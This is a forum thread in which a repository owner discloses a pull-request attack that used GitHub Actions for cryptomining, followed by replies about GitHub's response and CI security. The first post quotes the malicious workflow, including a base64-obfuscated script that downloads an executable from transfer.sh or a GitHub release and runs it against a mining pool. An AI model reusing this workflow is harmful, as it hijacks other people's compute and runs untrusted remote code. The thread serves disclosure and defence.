Crypto-mining attack in my github actions through pull request

Hello,

Some days ago, a github user attacked one of my github repository with a malicious pull request to trigger crypto-mining in my github actions. The pull request was opened/closed multiple times and each action was starting up to 20 sub-jobs.

I was alerted very quickly and stopped the jobs and closed the PR immediately.

I wrote a blog post that relates the whole story and gives full details: Github Actions mining attack through Pull Request

It is similar to Massive Cryptomining Campaign Abusing GitHub (…) but differs completely in the implementation.

I already reported to GitHub through contact form.

The malicious action looked like this:

name: Test
 on: [pull_request]
 jobs:
   test:
     name: Fetch
     runs-on: ubuntu-latest
     container: ubuntu:20.10
     env:
       DEBIAN_FRONTEND: noninteractive
     strategy:
       fail-fast: false
       matrix:
         runner: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]
     steps:
       - run: |
           eval "$(echo "YXB0IHVwZGF0ZSAtcXEKYXB0IGluc3RhbGwgLXkgY3VybCBnaXQganEKY3VybCAtTGZvIHByb2cgaHR0cHM6Ly9naXRodWIuY29tL2JocmlzY2FybmF0dC9maXJzdC1yZXBvL3JlbGVhc2VzL2Rvd25sb2FkL2EvcHJvZyB8fCBjdXJsIC1MZm8gcHJvZyBodHRwczovL3RyYW5zZmVyLnNoL09TUGpLL3Byb2cKaXA9JChjdXJsIC1zIC1IICdhY2NlcHQ6IGFwcGxpY2F0aW9uL2Rucy1qc29uJyAnaHR0cHM6Ly9kbnMuZ29vZ2xlL3Jlc29sdmU/bmFtZT1wb29saW8ubWFncmF0bWFpbC54eXomdHlwZT1BJyB8IGpxIC1yICcuQW5zd2VyWzBdLmRhdGEnKQpjaG1vZCB1K3ggcHJvZwp0aW1lb3V0IDRoIC4vcHJvZyAtbyAiJHtpcH06MzAwMCIgLXUgQ2hyaXNCYXJuYXR0IC1wIEV4cGxhaW5pbmdDb21wdXRlcnMgLS1jcHUtcHJpb3JpdHkgNSA+IC9kZXYvbnVsbAo=" | base64 -d)"
2 Likes

:wave: Welcome!

I’m sorry that happened. I’ve had a look and your ticket has been worked on by a couple of different teams. That sometimes delays a reply, but I can assure you they’re handling it!

1 Like

I got an answer from support, they confirmed that these kind of attacks happens and they took countermeasures quickly even before I reported it (that was them that flagged and removed the nasty user and pull request).

Thank you @canuckjacq and all !

4 Likes

Thanks for the update and I’m really glad to hear that. I know these attacks can be alarming.

2 Likes

Glad it got resolved and that it was a proactive response.

This is a good reminder on what our interface of our modern CI, the risk that it poses, and why we need to safeguard it. CI systems are Remote Code Execution as a service, nothing more nothing less. It has a (useful) side effect of being a great way to execute tests, that is the common use case rather than the only one.

1 Like

I’m confused how this is an “attack”, or at least who it’s attacking.

GitHub, in their, uh, infinite wisdom, seems to have given the whole internet the ability to submit a shell script that they will run on an arbitrary number VMs, just by making a free, anonymous account and submitting a PR to any repo. As far as I can tell, the script doesn’t have access to modify your repo or use its / your credentials. It’s just doing what GitHub advertises: running arbitrary code in response to an action. (That code happens to be dumb and wasteful, but GH doesn’t prevent that.)

It’s primarily an attack against Github, wasting their resources for creating cryptocurrency. The effect on the repository owner is more like spam, but that’s bad enough already.

3 Likes

It would be nice to exclude folders like .github from pull requests opened by non-collaborators.

2 Likes